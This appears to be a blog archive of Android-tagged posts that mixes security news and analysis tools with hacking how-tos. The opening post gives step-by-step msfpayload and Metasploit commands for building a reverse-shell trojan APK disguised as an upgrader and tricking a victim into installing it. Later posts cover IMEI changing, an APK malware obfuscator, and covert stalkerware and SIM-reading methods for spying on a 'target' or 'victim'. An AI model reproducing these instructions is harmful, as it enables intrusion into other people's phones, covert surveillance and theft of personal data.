Affichage des articles dont le libellé est Android. Afficher tous les articles
Affichage des articles dont le libellé est Android. Afficher tous les articles

Hack Any Android Device

Android devices are widely used around the world; applications are making this platform preferable by millions of users. As these devices are used by many, hackers are exploiting it to harm users and steal personal data.



In this tutorial we are going to learn how to hack any android device with Kali Linux. This tutorial will explain you step by steps:

Step 1:

Open a terminal, and make a Trojan.apk
You can do this by typing :
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)



Step 2:
Open another terminal until the file is being produced.
Load metasploit console, by typing : msfconsole




Step 3:
After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler



Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
To set Lhost type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)



Step 4:

At last type: exploit to start the listener.
Copy the application that you made (Upgrader.apk) from the root folder, to your android phone.
Send it to victim’s device and let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
And when he clicks Open, exploit will run and you will get access.





However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) Go to security settings of the android phone to allow the Trojan to install. There is condition for this exploit that victim must install/open your sent Trojan, this will allow you to enter victim’s device.

Follow these simple step and exploit any android device.

Read more

by Malik korrich ~ samedi 2 juillet 2016 1 commentaires

Change IMEI - MEUI META 3G

Note :

Please read this post before proceeding - All About IMEI . It is important that you know what is database file , etc.

Pre-requests :

  • MEUI META 3G ( download link below )
  • Database File ( Read this post for More )
  • USB cable ( normal phone usb cable )
  • MTK device ( MT65xx+ processor is best. Tested on android one device and yu yureka )


How to change IMEI of an android device.

  1. Download and install latest version of MEUI META 3G tool ( download link given below )
  2. Launch the application as admin ( run as administrator )
  3. Select USB COM ( we are using USB cable so we need to select USB COM )
  4. Go to options 
  5. Select - Connect Smart Phone into META mode 
  6. Switch off your phone
  7. Select Reconnect ( Circle will blink in Green and Red )
  8. Connect your device in switch off mode ( Note : If your phone is not connected automatically withing 3 minutes then you need to turn your phone on with plugged USB cable )
  9. Circle will turn yellow ( this indicates phone is connected )
  10. Select IMEI Download ( Change Get Version to IMEI download )
  11. Select Upload from flash 
  12. Select Database File ( first select APDB file and then BPLGU file . All files will be in the stock rom of your device )
  13. Enter new IMEI ( use IMEI generator Tool to generate valid IMEI )
  14. Click Download to flash
  15. Close the box and remove USB 
  16. Turn phone ON

Download Links :



Full Video Tutorial ( watch both tutorial before trying it ) :

Tutorial 1

Tutorial 2 



******************
About Author :

Priyank Gada 

Read more

by Malik korrich ~ samedi 11 juin 2016 0 commentaires

Mobile Security Framework - MobSF

Mobile Security Framework (MobSF) is an intelligent, all-in-one open source mobile application (Android/iOS) automated pen-testing framework capable of performing static and dynamic analysis. We've been depending on multiple tools to carry out reversing, decoding, debugging, code review, and pen-test and this process requires a lot of effort and time. Mobile Security Framework can be used for effective and fast security analysis of Android and iOS Applications. It supports binaries (APK & IPA) and zipped source code.

The static analyzer is able to perform automated code review, detect insecure permissions and configurations, and detect insecure code like ssl overriding, ssl bypass, weak crypto, obfuscated codes, improper permissions, hardcoded secrets, improper usage of dangerous APIs, leakage of sensitive/PII information, and insecure file storage. The dynamic analyzer runs the application in a VM or on a configured device and detects the issues at run time. Further analysis is done on the captured network packets, decrypted HTTPS traffic, application dumps, logs, error or crash reports, debug information, stack trace, and on the application assets like setting files, preferences, and databases. This framework is highly scalable that you can add your custom rules with ease. A quick and clean report can be generated at the end of the tests. We will be extending this framework to support other mobile platforms like Tizen, WindowsPhone etc. in future.

Download

Installation

Tested on Windows 7, 8, 8.1, 10, Ubuntu, OSX Mavericks
  • Windows: Extract the MobSF compressed file to C:\MobSF
  • Mac: Extract MobSF compressed file to /Users/[username]/MobSF
  • Linux: Extract MobSF compressed file to /home/[username]/MobSF
Read more

by Malik korrich ~ mardi 16 février 2016 0 commentaires

Android Vulnerability Scanner: AndroBugs

AndroBugs Framework is an Android vulnerability analysis system that helps developers or hackers find potential security vulnerabilities in Android applications. No splendid GUI interface, but the most efficient (less than 2 minutes per scan in average) and more accurate.

Features:

  • Find security vulnerabilities in an Android app
  • Check if the code is missing best practices
  • Check dangerous shell commands (e.g. “su”)
  • Collect Information from millions of apps
  • Check the app’s security protection (marked as , designed for app repackaging hacking)

Steup Steps and Usage for Windows

Easy to use for Android developers or hackers on Microsoft Windows: (a) No need to install Python 2.7 (b) No need to install any 3rd-party library (c) No need to install AndroBugs Framework
  1. mkdir C:\AndroBugs_Framework
  2. cd C:\AndroBugs_Framework
  3. Unzip the latest Windows version of AndroBugs Framework from Windows releases
  4. Go to Computer->System Properties->Advanced->Environment Variables. Add "C:\AndroBugs_Framework" to the "Path" variable
  5. androbugs.exe -h
  6. androbugs.exe -f [APK file]

Usage for Unix/Linux

To run the AndroBugs Framework:

python androbugs.py -f [APK file]

To check the usage:

python androbugs.py -h

Example:

python AndroBugs_ReportByVectorKey.py -v WEBVIEW_RCE -l Critical -b 20151112 -t BlackHat
python AndroBugs_ReportByVectorKey.py -v WEBVIEW_RCE -l Critical -b 20151112 -t BlackHat -a

Download and read more at

Android Vulnerability Scanner
Rated 4.9/5 based on 987 reviews

You can also see the Android application penetration testing course.
Read more

by Malik korrich ~ jeudi 4 février 2016 0 commentaires

Android security updates: 7 critical vulnerabilities fixed

Google releases its monthly update for its Nexus users; which eliminated some severe security vulnerabilities in its Android OS. The latest update patches a bug which can be exploited by an MMS, Email or a website which contains a specially crafted media file.



These patched flaws are effecting Android KitKat 4.4.4,  Android Lollipop 5.1 and Android 6.0 versions. Two critical remote execution vulnerabilities in media server could allow an attacker to cause memory corruption and remote code execution as the media server process.

The patched bugs are reported on January 4th this year. Blackberry was the only vendor who released an update for its PRIV handsets, within few hours of Google's OTA update for Nexus users. Samsung users will have to wait for a week or two before they update their Android handsets.

The critical flaws which are fixed in Nexus devices are:


  • Remote Code Execution Vulnerability in Broadcom Wi-Fi Driver
  • Remote Code Execution Vulnerability in Mediaserver
  • Elevation of Privilege Vulnerability in Qualcomm Performance Module
  • Elevation of Privilege Vulnerability in Qualcomm Wi-Fi Driver
  • Elevation of Privilege Vulnerability in the Debugger Daemon 
This is the seventh update Google has released since the start of its monthly security update program in June last year. Android security researchers earned around $200,000 since the program is launched. 
Read more

by Malik korrich ~ mardi 2 février 2016 0 commentaires

Google fixes four critical vulnerabilities in latest Android update

Google has released it's latest Android update for its Nexus family, which eliminated around 16 vulnerabilities in Android OS. The update is part of the google's security policy in which company will release a security update every month to make its Nexus devices more secure.



There are some highly critical vulnerabilities fixed in this latest monthly update, one of the critical flaw could lead to permanent device compromise. Which can only be fixed by reflashing the entire OS. Apart from fixing this critical vulnerability , latest update eliminated three other highly critical vulnerabilities according to an official announcement on google groups.

Google started this monthly security patch update program back in August and the company has received pretty warm feedback from its Nexus users. This is the fifth security patch and so far more than 15 critical vulnerabilities has been fixed in Nexus devices since the start of August.

Here is the list of highly critical vulnerabilities fixed by Google in this latest update:

  Remote Code Execution Vulnerability in Mediaserver – (CVE-2015-6616)

This vulnerability can allow an attacker to cause memory corruption and remote code execution as the mediaserver process.

 Remote Code Execution Vulnerability in Skia – (CVE-2015-6617)

A vulnerability in the Skia component may be leveraged when processing a specially crafted media file, that could lead to memory corruption and remote code execution in a privileged process. 

 Elevation of Privilege in Kernel – (CVE-2015-6619)

An elevation of privilege vulnerability in the system kernel could enable a local malicious application to execute arbitrary code within the device root context.

 Remote Code Execution Vulnerabilities in Display Driver – (CVE-2015-6633,CVE-2015-6634)

There are vulnerabilities in the display drivers that, when processing a media file, could cause memory corruption and potential arbitrary code execution in the context of the user mode driver loaded by mediaserver.

There are other 10 vulnerabilities which the security team rated as highly seavere and only two are rated as Moderate. The updates are currently only available for Nexus users, but other Android users (Samsung,LG,Black Berry) will receive the updates in few days. 
Read more

by Malik korrich ~ mardi 8 décembre 2015 0 commentaires

AAMO: Another Android Malware Obfuscator


AAMO: Another Android Malware Obfuscator

Set of code-obfuscation scripts tailored for Android applications. Assume that the original application can be disassembled into Smali.

Usage

$ mkdir dir_with_apks_to_obfuscate/     # fill the dir with some APKs
$ vim obfuscators/obfuscators.py

Set the obfuscator_to_apply variable to define the list of obfuscators you want to apply.

For example:

obfuscator_to_apply = [
    'Resigned',
    'Alignment',
    'Rebuild',
    'Fields',
    'Debug',
    'Indirections',
    'Defunct',
    'StringEncrypt',
    'Renaming',
    'Reordering',
    'Goto',
    'ArithmeticBranch',
    'Nop',
    'Asset',
    'Intercept',
    'Raw',
    'Resource',
    'Lib',
    'Restring',
    'Manifest',
    'Reflection']

You can choose a subset of obfuscators (recommended).

$ python obfuscators/obfuscators.py

Enjoy your obfuscated APKs.

Obfuscation Operators

Support:

Android specific

  • Repackaging
  • Reassembly
  • Re-alignment


Simple control-flow modifications

  • Junk code insertion
  • Debug symbols stripping
  • Defunct code insertion
  • Unconditional jump insertion


Advanced control-flow modifications

  • Call indirection
  • Code reordering
  • Reflection
  • Opaque predicate insertion


Renaming

  • Non-code files and resource renaming
  • Fields and methods renaming
  • Package renaming


Encryption

  • Resource encryption (asset files)
  • Native code encryption
  • Data encryption (strings)

Read more

by Malik korrich ~ vendredi 13 novembre 2015 0 commentaires

Amazon selling Android tablets with pre-installed Chinese Trojan

Android Tablets with pre-installed Trojan were sold on Amazon and some other online market places, which will install a malicious malware and corrupts antivirus apps silently from devices. The Trojan is dubbed as "Cloudsota", which was first discovered by the Cheetah Mobile Security Lab researchers.



This Trojan is developed by Chinese hackers according to Cheetah Mobile Security Lab researchers because the Trojan code, location of malware server and it was manufactured by Chinese companies. Cheetah Mobile Security Lab researchers posted the reviews of many customers who purchased these cheap Android tablets from online marketplaces like Amazon.

The researchers further identified that an attacker can remotely control these infected tablets. The number of tablets delivered which are infected with these Trojans are believed to be around 17,233 but there is a large number which is already been shipped by Amazon and other online marketplaces. 

Cloudsota infected devices are redirecting to some strange ads pages, automatically removing anti-virus apps, changing the users default home page. Because the Trojan has root permission, it will be restored automatically after rebooting the device. So, practically users cannot remove this Trojan from their devices.

United States, Mexico and Turkey are the countries where these pre-installed Trojan tablets are shipped. But the tablets with no brand name are believed to be highly effected according to the Cheetah Mobile research team. There are around 30 brands with are also infected with Cloudsota Trojan, but severity level is pretty low.

The Amazon and other online marketplaces are still selling these infected Trojans. So, people should avoid ordering any unbranded or low priced tablets from these marketplaces for now. Some Android tablet brands which are believed to be infected with Cloudsota Trojan are  JYJ 7, JEJA 7 Zoll, FUSION5, Alldaymall Tablet, Yuntab SZ Wave, and Tagital.

All of these infected tablets are manufactured by the Chinese manufactures, who didn't even responded to the Cheetah Mobile security lab when they suggested them to analyze their firmware. This is not the first time a n Android device is sold with a per-installed Trojan. People in Asia and Africa has been target before with the same type of campaigns.

Read more

by Malik korrich ~ mercredi 11 novembre 2015 0 commentaires

Android fixes critical vulnerabilities with latest Nexus update

Android developers today released a new update for its Nexus devices; which fixes seven severe vulnerabilities two of them are rated as "critical".

The update is part of the google's new security policy which was announced in August, where google will release an update every month with an aim to eliminate all new vulnerabilities in its OS.

The two highly critical vulnerabilities eliminated in this latest Android update are - "Remote Code Execution Vulnerabilities in Mediaserver" and "Remote Code Execution Vulnerability in libutils".

Four out of five other vulnerabilities fixed are rated as highly severe. The Nexus users are over the moon after the news of this latest update.


Critical Vulnerability details: 

Remote Code Execution Vulnerabilities in Mediaserver - (CVE-2015-6608)

This vulnerability was reported by the Google Chrome security team researchers. Android developers rated this vulnerability 'critical' because it allows an hacker to remotely execute code, in other words malware activated by playing a specially crafted media file on a affected phone or tablet.

The vulnerability targets the key part of OS, which has access to permissions that third party apps cannot normally access. It is believed that no Android user is effected by this critical vulnerability because it was discovered by Google family security team researchers before any hacker.


Remote Code Execution Vulnerability in libutils - (CVE-2015-6609) 

This critical vulnerability is effecting version 6.0 and below. The vulnerability was first discovered and reported by the Copperhead Security researcher, "Daniel Micay". This vulnerability can be used through audio file processing. It could allow an hacker to cause memory corruption and remotely execute code, (code can be a malware).

The core reason behind security team rating this vulnerability critical is because of the possibility of remote code execution in a privileged service.  The affected component has access to audio and video streams as well as access to privileges that third-party apps cannot normally access.

There are other 4 vulnerabilities which the Android security team rated as highly severe - full report. While only one vulnerability severity level is Moderate. The rating of these vulnerability is based on the effects, a device can suffer if an attacker successfully exploits it.

All the Nexus users should not waste any time in updating their devices, since the vulnerabilities are being fixed. Security researchers has applauded the Google's latest policy of releasing updates like these every month, which fixes flaws in its OS. It will not only makes their users feel secure but will also increases the Nexus market share in long run.


Read more

by Malik korrich ~ lundi 2 novembre 2015 0 commentaires

LiME Linux Memory Extractor

LiME ~ Linux Memory Extractor

A Loadable Kernel Module (LKM) which allows for volatile memory acquisition from Linux and Linux-based devices, such as Android.

This makes LiME unique as it is the first tool that allows for full memory captures on Android devices. It also minimizes its interaction between user and kernel space processes during acquisition, which allows it to produce memory captures that are more forensically sound than those of other tools designed for Linux memory acquisition.

Table of Contents

  • Features
  • Usage
  • Examples
  • Presentation

Features

  • Full Android memory acquisition
  • Acquisition over network interface
  • Minimal process footprint


Usage

Detailed documentation on LiME's usage and internals can be found in the "doc" directory of the project.

LiME utilizes the insmod command to load the module, passing required arguments for its execution.

insmod ./lime.ko "path=> format= [dio=<0|1>]"

path (required):   outfile ~ name of file to write to on local system (SD Card)
        tcp:port ~ network port to communicate over

format (required): raw ~ concatenates all System RAM ranges
        padded ~ pads all non-System RAM ranges with 0s
        lime ~ each range prepended with fixed-size header containing address space info

dio (optional):    1 ~ attempt to enable Direct IO
        0 ~ default, do not attempt Direct IO

localhostonly (optional):  1 restricts the tcp to only listen on localhost, 0 binds on all interfaces (default)

Examples

In this example we use adb to load LiME and then start it with acquisition performed over the network

$ adb push lime.ko /sdcard/lime.ko
$ adb forward tcp:4444 tcp:4444
$ adb shell
$ su
# insmod /sdcard/lime.ko "path=tcp:4444 format=lime"

Now on the host machine, we can establish the connection and acquire memory using netcat

$ nc localhost 4444 > ram.lime

Acquiring to sdcard

# insmod /sdcard/lime.ko "path=/sdcard/ram.lime format=lime"


Download
Read more

by Malik korrich ~ mercredi 21 octobre 2015 0 commentaires

How to exploit Vulnerability in Siri and Google Now.

Researchers of French Intelligence Agency, ANSSI found that Hackers can control the smartphone devices from 16 feet away. The user would have no idea that his smartphone has been hacked the research says.

The hackers are exploiting vulnerabilities in Siri and Google Now, with the help of radio signals without even saying a word. The hacker can send text messages, emails, and browse on internet without even asking for your permission. 

How does a hacker control your device? 

The Hacker can only target those devices if the targets headphones are plugged into the jack, only this way the hacker can get into your device without even asking for your permission. 
The hacker should have a radio transmitter to start his hacking operation. It will be used to send  radio waves that are able to trigger voice commands on Siri and Google Now with a pair of microphone-enabled headphones plugged in.


The users headphone cable will work as radio antennas, this way the Siri or Google Now app will receive commands which it believe is coming from users microphone.  The french researchers presented their discovery in Hack in Paris conference.  


They presented how a hacker can send sms, emails, visit website managed by hacker, send phishing and spam messages exploiting emails, facebook and other social media accounts.

The French duo used as a generator of electromagnetic waves their laptop running the open-source software GNU Radio, a USRP software-defined radio, an amplifier, and an antenna.


The researchers explained that their basic equipment could fit inside a backpack and can reach a range of around six and a half feet. In a more powerful configuration composed of larger batteries that could fit inside a van, the researchers say they could extend the attack’s range to more than 16 feet.

The two experts also published a Video Proof of Concept for the attack, they demonstrated how send a command to Google Now via radio on an Android smartphone instructing the mobile device to launch the browser to visit the ANSSI official website. 

Read more

by Malik korrich ~ jeudi 15 octobre 2015 0 commentaires

Kemoge Malware: A nightmare for Android users.

A malware name Kemoge was discovered by researchers on Wednesday which is effecting Android users in more than 20 countries.The malware was discovered by the Fireeye Researchers which they believe is written by Chinese developers or controlled by Chinese hackers. This malware can only effect users who install third-party apps in their android devices. But still Kemoge is spreading very quickly around the world.


Kemoge tricks a user through ads to install an app from third party source.The apps are duplicates of software that can be found on the Google Play Store. The key difference is that they attack the user's device after installation.

In a blog post written on Fireeye blog the researchers said that, " The attacker uploads the apps to third-party app stores and promotes the download links via websites and in-app ads. Some aggressive ad networks gaining root privilege can also automatically install the samples. On the initial launch, Kemoge collects device information and uploads it to the ad server, then it pervasively serves ads from the background. Victims see ad banners periodically regardless of the current activity (ads even pop up when the user stays on the Android home screen)." 

How can a Android user secure himself from Kemoge

The Kemoge Malware is still out there and it has effected many Android users in U.S too. It maybe not reached your country yet but with the way it is spreading it can hit your device before you even know it. Here are the few security tips which can help you prevent this malware from entering your device. 
  • Don't click on links from Advertisement, Emails, SMS or Websites. Kemoge can enter your device from these platforms. 
  • Try not to install third-party apps, only trust on apps from Android's App Store. 
  • Always keep you device up to date. Upgrading to the latest version of OS will provide some security, but it does not guarantee that you will remain protected. 


Read more

by Malik korrich ~ jeudi 8 octobre 2015 0 commentaires

Your Android Phone is Vulnerable To Remote Hacking With StageFright Bugs


Your Android Phone is Vulnerable To Remote Hacking With StageFright Bugs!

Stagefright 2.0, a set of two vulnerabilities that manifest when processing specially crafted MP3 audio or MP4 video files. 

Security Researcher of Zimperium Joshua Drake (Vice President of platform research and exploitation at Zimperium) discovered two more vulnerabilities in the Android. His aimed to researching media processing in Android and focused on remote attacks agains current devices.

What is the vulnerability ? 
Processing specially crafted MP3 or MP4 files can lead to arbitrary code execution. -

The vulnerability lies in the processing of metadata within the files, so merely previewing the song or video would trigger the issue. Since the primary attack vector of MMS has been removed in newer versions of Google’s Hangouts and Messenger apps, the likely attack vector would be via the Web browser.

  • An attacker would try to convince an unsuspecting user to visit a URL pointing at an attacker controlled Web site (e.g., mobile spear-phishing or malicious ad campaign)
  • An attacker on the same network could inject the exploit using common traffic interception techniques (MITM) to unencrypted network traffic destined for the browser.
  • 3rd party apps (Media Players, Instant Messengers, etc.) that are using the vulnerable library.

After the execution this Vulnerbaility allow attackers to access to personal data and photos stored on the phone, be able to take photos, record conversations, email and SMS and can download malicious apps remotely.

Google said that new Stagefright bugs will be fixed in next schedule update.

Source: Zimperium
Read more

by Malik korrich ~ jeudi 1 octobre 2015 0 commentaires

Google is Set To Launch its Background Play Service YouTube Red


Google is Set To Launch its Background Play Service "YouTube Red".

YouTube Sent the information to all companies that they have to agree to new terms by Oct. 22 or their “videos will no longer be available for public display or monetization in the United States,” helps support that timeline.

According to a report by Android Police, an update to the YouTube app includes text that describes a product called YouTube Red as the service that enables background playback, a feature that has long been restricted to Music Key (and Music Unlimited) subscribers.





For years, YouTube’s fans have been telling us they want more — more choice when watching their favorite content, more ways to support their favorite creators and, above all, the option to watch their favorite videos uninterrupted.
To give fans more choice we will be launching a new ads-free version of YouTube, available to fans for a monthly fee. This service will create a new source of revenue over time that supplements your advertising revenue. That’s why an overwhelming majority of our partners — representing over 95% of YouTube watchtime — have asked for and signed up for this service.
As you heard in our previous emails, we want to ensure that fans who choose to pay for an ads-free experience can watch all the same videos that are available on the ads-supported experience. That’s why we’re asking you to update your agreement to reflect the updated terms for the ads-free service.
To accept, simply log into YouTube.com as “pakafka” from a desktop or laptop and follow the prompts by October 22nd.
If you haven’t signed by that date, your videos will no longer be available for public display or monetization in the United States. That outcome would be a loss for YouTube, a loss for the thriving presence you’ve built on the platform, and above all, a loss for your fans. We remain committed to working with you, as we always have. And of course, at any time, you can accept the updated terms which will make your videos public and monetizable again. Common FAQs can be found here.
We believe these new terms will greatly strengthen our partnership for the future. We went through a similar process three years ago when we began distributing and monetizing your content on mobile devices. Today, mobile represents over half of all watchtime and mobile revenue is up 2x in just the last year. Just as with mobile, we’re confident this latest update will excite your fans and generate a previously untapped, additional source of revenue for you. 

If you have questions or encounter technical difficulties, we’re here to help: reach out to us for support here. 

The YouTube Team

Source: Recode , AndroidPolice

Share this article Link with your friends

Follow iGadgetware on Facebook TwitterGoogle+
Read more

by Malik korrich ~ vendredi 25 septembre 2015 0 commentaires

NowSecure Developed Android Vulnerability Test Suite For Recent Devices


NowSecure Developed Android Vulnerability Test Suite For Recent Devices.

Android Vulnerability Test Suite - In the spirit of open data collection, and with the help of the community, let's take a pulse on the state of Android security. NowSecure presents an on-device app to test for recent device vulnerabilities.

This tool was meant to show the end user the attack surface that a given device is susceptible to. In implementing these checks we attempt to minimize or eliminate both false positives/false negatives without negatively affecting system stability.

Rationale for necessity

When a vulnerability is discovered, Google receives word and applies a patch to Android. The Nexus devices are usually the devices that receive these patches quickest as they deviate the least (read: not at all) from AOSP (Android Open Source Project - The core of Android, where Google commits to). The lag time between learning about a bug and the time when a patch is applied to a device can still be significant (for OEMs, it can be > 1 year or never). For example, the futex bug (CVE-2014-3153/Towelroot) was known about in late May, early June. This bug took multiple months to get patched on the flagship (at the time) Nexus 5. This leaves users extremely vulnerable to attack from applications. Users mostly do not know that their devices are vulnerable and this tool is meant to give visibility into the vulnerabilities a given device is susceptible to.

Lifecycle of a patch

Samsung, HTC, and every other OEM keep heavily customized versions of Android. The patch deployment infrastructure from OEMS -> carriers -> users is in disarray. The OEMs receive the patches from Google and spend weeks or months applying these to some devices and testing. Then they ship off the device updates to the carrier who is responsible for pushing them to the end user. They then go through another QA cycle from the carrier.

Implementation

Vulnerabilities in a device can exist at many layers inside of Android. For example, a bug can exist in the kernel (Towelroot, for example) or it can exist in the Android specific framework (Android Masterkeys/FakeID). Some of the kernel bugs can sometimes be difficult to check for without potentially causing system instability. This implementation takes care to not include checks that could cause instability problems for the end user and therefore may omit checks that could cause these types of issues. The framework is very thin at the current time and consists of a vector of vulnerability checks. Their concrete implementations vary wildly depending on the bug.

Download
Read more

by Malik korrich ~ dimanche 20 septembre 2015 0 commentaires

PATDroid Collection of Tools And Data Structures For Analyzing Android Applications


PATDroid Collection of Tools And Data Structures For Analyzing Android Applications 

PATDroid is a collection of tools and data structures for analyzing Android applications and the system itself. We intend to build it as a common base for developing novel mobile software debugging, refactoring, reliability/security tools. 

We also collect various resources, links, related papers and tips for various innovative Android program analysis tasks.

Packages

Here is a one-sentence description for each package. Find the detailed usage tutorials on our wiki by clicking on the package name. PATDroid requires Java6. It goes well with Oracle/OpenJDK 1.6, 1.7, Dalvik (Yes, you can run it on a smartphone). We provide gradle, Intellij IDEA and Eclipse support for the project.
  • patdroid.core: provide abstractions for method, class, field, and primitive Java type values
  • patdroid.permission: specify what Android permissions are needed by every Android APIs
  • patdroid.fs: an emulated Android file system
  • patdroid.dalvik: Android Dalvik JVM instructions and representations
  • patdroid.smali: using SMALI to extract classes, methods, fields and instructions from an APK

According to our blueprint, we plan to release the following components one by one in the near future:
  • patdroid.dex2jar: using dex2jar to extract classes, methods, fields and instructions from an APK
  • patdroid.manifest: the model for AndroidManifest.xml and Android components such as activity, service, broadcast receivers
  • patdroid.sdk: modeling different Android API levels
  • patdroid.taint: sources, sinks and taint propagation support for taint analysis
  • patdroid.lifecycle: modelling the life cycles for important Android components
  • patdroid.layout: understanding layout.xml
  • patdroid.soot: my tribute to Sable's Soot. I learned a lot from attending Sable's seminars held at McGill McConnell 2rd floor

Using PATDroid

PATDroid uses Apache License 2.0. Additionally, if you intend to use it in academic work, please cite our paper:

@inproceedings{appaudit,
 author = {Mingyuan Xia and Lu Gong and Yuanhao Lyu and Zhengwei Qi and Xue Liu},
 title = {Effective Real-time Android Application Auditing},
 booktitle = {Proceedings of the 2015 IEEE Symposium on Security and Privacy},
 series = {SP '15},
 year = {2015},
 publisher = {IEEE Computer Society},


History and Philosophy

PATDroid was part of AppAudit, which is a security tool that checks if an Android app leaks personal data. You can find out more details from our S&P'15 paper. We make part of AppAudit public to be useful to researchers and developers. Overall, we try to make the entire project

  1. concise (with fewer abstractions as possible such that users wont feel like searching a needle in the ocean)
  2. properly documented (javadoc, and wiki tutorial)
  3. loosely coupled (packages trying to be self-contained)
  4. efficient (graduate students need life with bf/gf not with computers)
  5. look like good code

Download
Read more

by Malik korrich ~ vendredi 11 septembre 2015 0 commentaires

Yandex Rolls Out Multifunctional App for Android Users


Yandex Rolls Out Multifunctional App for Android Users.

Press Release:

"The current popularity of Android OS on the markets across the world is stemming from the universal accessibility of a wide range of cheap smartphones that support this platform. 

Android-powered devices allow everyone, including those who are not ready to pay a lot of money for the privilege of using mobile internet, to enjoy all the benefits of staying online while on the move. On the flip side, budget phones lack in power when it comes to performance and memory space, so users often have to install only the most frequently used apps to keep their phones alive. ‘There’s an app for that’ doesn’t really work for a lot of budget smartphone users.

To make life easier for low-end phone users – at least when it comes to Yandex services – we have re-launched our search app for Android. The new Yandex app has expanded the range of its functions and is now an all-in-one solution that caters to multiple needs of its user – from current weather, currency exchange rates or traffic conditions to what’s on in the cinema around the corner, or the shortest way to the nearest bank or restaurant. To solve any of these tasks one doesn’t even need to have a specialized app, such as Yandex.Maps, Yandex.Navigator or Yandex. Weather installed on their phone – the refurbished Yandex app will take the user to the mobile version of the relevant service at Yandex.ru."

Reported by Yandex

Share this article Link with your friends

Follow iGadgetware on Facebook TwitterGoogle+
Read more

by Malik korrich ~ jeudi 6 août 2015 0 commentaires

MFFA - Media Fuzzing Framework for Android

The main idea behind this project is to create corrupt but structurally valid media files, direct them to the appropriate software components in Android to be decoded and/or played and monitor the system for potential issues (i.e system crashes) that may lead to exploitable vulnerabilities. Custom developed Python scripts are used to send the malformed data across a distributed infrastructure of Android devices, log the findings and monitor for possible issues, in an automated manner. The actual decoding of the media files on the Android devices is done using the Stagefright command line interface. The results are sorted out, in an attempt to find only the unique issues, using a custom built triage mechanism.


 
 
 

Some results - vulnerabilities discovered

  • Multiple integer overflows in Stagefright code (libstagefright SampleTable):

    • CVE-2014-7915
    • CVE-2014-7916
    • CVE-2014-7917
  • A crafted MPEG4 media file can result in heap corruption in libstagefright, that can lead to arbitrary code execution in the mediaserver process:

    • CVE-2015-3832
 Download and read more at:
Read more

by Malik korrich ~ jeudi 30 juillet 2015 0 commentaires

Android Phones Can Be Hacked With Just A Text Message




     Android Phones Can Be Hacked With Just A Text Message


Yes, you heard it right!


About 990 Million Android Phones could be hacked with just a simple text. This is one of the biggest smartphone flaw ever found.


A Security Research Company ‘Zimperium’ claims to have found a bug to tap into the world’s most popular mobile platform. This hack relies on flaw found in Stagefright, a core android component and a media playback service that’s built into Android which is used to process, record and play the multimedia files.

This security hole puts 990 million Android devices at risk. And that is truly a huge number of smartphones. In 2014, more than 1 billion Android phones shipped throughout the world, in accordance with Researcher Strategy Analytics, which expects the number to go up in 2015 and beyond. Zimperium termed Stagefright the "Mother of all Android vulnerabilities". In this attack, the victim would not need to do any mistake like opening an attachment or download a file that's corrupt. The malicious code would take over instantly, the moment you receive a text message. You may not even see anything.

Once the attackers get in, Drake says, they would be able to do anything — may be copy or delete the data, take the control of your camera and microphone to monitor your every move. "It's really up to their imagination what they do once they get in," he said.

Joshua Drake, VP of platform research and exploitation of a mobile security firm Zimperium, reported the flaw to Google earlier this year, but he said that most manufacturers have not made fixes available to the user base till date. 

All the bugs are provided with CVE numbers, used to identify the severe vulnerabilities. They include CVE-2015-1538, CVE-2015-1539, CVE-2015-3824, CVE-2015-3826, CVE-2015-3827, CVE-2015-3828, CVE-2015-3829. When the disclosure lands today, security researchers and attackers could have enough information to get cracking on exploits. Manufacturers have been requested to bring in patches as soon as possible to protect their consumers against this malicious flaw.

Even more information will be disclosed by Drake who deserves much credit for his work in addressing and fixing the issues, in full at the Black Hat and Defcon security events going to taking place in Las Vegas next week.


Read more

by Malik korrich ~ lundi 27 juillet 2015 0 commentaires

How to Spy on Text Messages

It seems that in recent years most of society, especially the younger generations, have turned to texting as their preferred mode of conversation. The infinite ability to communicate with other people around the world effortlessly has become a growing concern for parents and employers alike who wish to 'keep an eye on', or monitor, their children or employees. In this post we will discuss the methods and implications of text message spying.

Methods To Spy On Text Messages

There are several methods to spy on text messages, however we would only discuss the following two methods which happen to be easy for parents/employeers to monitor their children/employees  activities.

Method 1: Using a Spying App

The easiest way to spy on text messages is to use one of spying application. Today there exist literally hundred's of products claiming to spy on text messages, however most of them are overpriced or they are not compatible with wide variety of smartphones. With that being said, there are still very few spying softwares that stand out to competition and one of my favorite is mspy.

mspy posses state of art stealth capabilities to spy on various text messaging applications such as Whatsapp, Viber, Facebok Messenger, LINE so on and so forth. Apart from that you can also monitor call logs and track location of smartphone (Absolutely must have for Parents).  The best part being that you don't have to jailbreak your iOS device or root your android device in order to install it.

How it works?

Upon placing and order for mspy, you would receive an application that you have to install on target's phone by simply launching the browser from the target phone, typing the URL and downloading and executing the application. Once you have successfully installed it, it would send alerts to your control panel or account which would be created once you have signed up. In case of any issue you can simply contact their 24/7 support team.

                                                             

Features

  • Monitor call logs, SMS and Contacts 
  • Spy on Internet activity including social media like Facebook, Twitter and Gmail.
  • It is not detected by antiviruses and operates in complete stealth mode,.
  • Spy on text messaging apps like WhatsApp, iMessage, Viber, Snapchat, Skype, LINE and more.
  •  Track GPS locations in real-time.
  •  Spy on all multimedia content stored on a device. Monitor what childrens are storing on their devices. 
  • 24/7 live support.

Compatibility

  • iPhone/iPad (iOS 6 – 8.3)
  • Android Phones (Version 4+)
Disclaimer: SOFTWARE INTENDED FOR LEGAL USES ONLY. It is the violation of the United States federal and/or state law and your local jurisdiction law to install surveillance software, such as the Licensed Software, onto a mobile phone or other device you do not have the right to monitor. RHA shall not be responsible for any misuse of this product.

Method 2: Using SIM Card Reader To Recover Messages

In case, if you can't afford an spying app, you could look for free alternatives, however there are few drawbacks to it. One being that a lot of them found on forums are backdoored, also they require good amount of technical knowledge to setup and operate. Another way is to buy a SIM card reader from market and use victim's SIM card to recover messages or phone contacts stored on it.

Requirements

  • PC/SC compliant smart card reader
Note: Some phones tend to keep messages inside their internal memory, in that case you have to move messages from internal memory to SIM card. 

Step 1: Download "Dekart SIM Manager"from here.


Step 2: Once the sim card has been plugged into the SIM card reader and the card reader has been connected to your computer. Press the"READ" button to read the messages, GSM contacts, last dialed numbers etc. 


